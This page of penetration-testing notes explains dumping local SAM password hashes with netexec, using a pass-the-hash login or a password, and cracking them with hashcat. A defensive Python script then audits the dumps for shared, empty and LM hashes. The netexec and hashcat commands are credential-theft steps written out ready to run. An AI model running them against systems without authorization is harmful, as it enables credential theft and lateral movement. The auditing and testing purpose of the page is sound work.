Dumping hashes

If we have a username and its password or NTLM hash for an account with local administrator rights on the host (netexec reports this as Pwn3d!), we can dump the hashes of all other local users from the SAM.

# Example:
# Check whether the account has local administrator access (look for "Pwn3d!" in the output).
# Add --local-auth here too if the account is a local account rather than a domain account.
netexec smb 192.168.117.212 -u $UserName -H $NTLMhash
netexec smb 192.168.117.212 -u $UserName -p $Password

# If the output says Pwn3d!, dump the SAM (local account database).
netexec smb 192.168.117.212 -u $UserName -H $NTLMhash --sam --local-auth
netexec smb 192.168.117.212 -u $UserName -p $Password --sam --local-auth

Save all the hashes, together with their usernames, in one file (all.hash below), keeping the user:RID:LM:NT::: layout that netexec prints. This is a manual step 😥

# Then try cracking them. If you recover a password, save it; otherwise move on.
hashcat -m 1000 --username all.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

hashcat -m 1000 --username all.hash --show
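Once the hashes are in that file, the findings worth reporting are the ones that make this technique work in the first place: accounts that share the same NT hash (the same local password reused across accounts, and across hosts when several dumps are merged), accounts with an empty password, and accounts that still store an LM hash. The audit script below is an added example for this page, not part of the original notes or of netexec or hashcat. It assumes the file uses the pwdump-style layout `user:RID:LM:NT:::` (the layout netexec prints for `--sam`), and the sample hashes in it are constructed hex values, not real dumps; the two constants (empty-password NT hash and blank LM hash) are the well-known Windows values.

```python
"""Audit a pwdump-style hash file (user:RID:LM:NT:::) for weak-credential hygiene.

Added example for this page; not part of netexec or hashcat. It reports findings
a remediation note would carry: shared local passwords (use unique per-host local
admin passwords), empty passwords, and LM hash storage still enabled.
"""
from collections import defaultdict

# Well-known Windows constants: NT hash of the empty password, and the value
# stored in the LM field when LM hashes are not kept.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"

# Constructed sample in the layout netexec --sam prints. Hash values are made-up
# hex strings (except the two well-known constants above), not real dumps.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
helpdesk:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1002:1111222233334444aaaabbbbccccdddd:fedcba9876543210fedcba9876543210:::
"""

HEX = set("0123456789abcdef")


def parse_pwdump(text):
    """Return a list of (user, rid, lm, nt) tuples; skip blank, comment and malformed lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue  # not the user:RID:LM:NT::: layout
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if len(nt) != 32 or not set(nt) <= HEX:
            continue  # NT field is not a 16-byte hex hash
        entries.append((user, rid, lm, nt))
    return entries


def audit(entries):
    """Group the parsed entries into the three findings described above."""
    findings = {"empty_password": [], "lm_hash_present": [], "shared_nt_hash": {}}
    by_nt = defaultdict(list)
    for user, rid, lm, nt in entries:
        if nt == EMPTY_NT:
            findings["empty_password"].append(user)
        if lm != BLANK_LM:
            findings["lm_hash_present"].append(user)
        by_nt[nt].append(user)
    # Several accounts with the same NT hash share the same password; the empty
    # hash is excluded because it is already reported separately.
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings["shared_nt_hash"][nt] = users
    return findings


def report(text):
    """Parse and audit a hash file's contents, returning the findings dict."""
    return audit(parse_pwdump(text))


if __name__ == "__main__":
    result = report(SAMPLE)
    print("Empty password:", ", ".join(result["empty_password"]) or "none")
    print("LM hash stored:", ", ".join(result["lm_hash_present"]) or "none")
    for nt, users in result["shared_nt_hash"].items():
        print("Shared NT hash", nt, "used by:", ", ".join(users))
```

Disabled built-in accounts such as Guest routinely carry the empty-password hash, so that finding needs a check of the account status before it is reported; the shared-hash finding is the one that matters for lateral movement risk, since it is exactly what lets one cracked or passed hash open other accounts and hosts.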
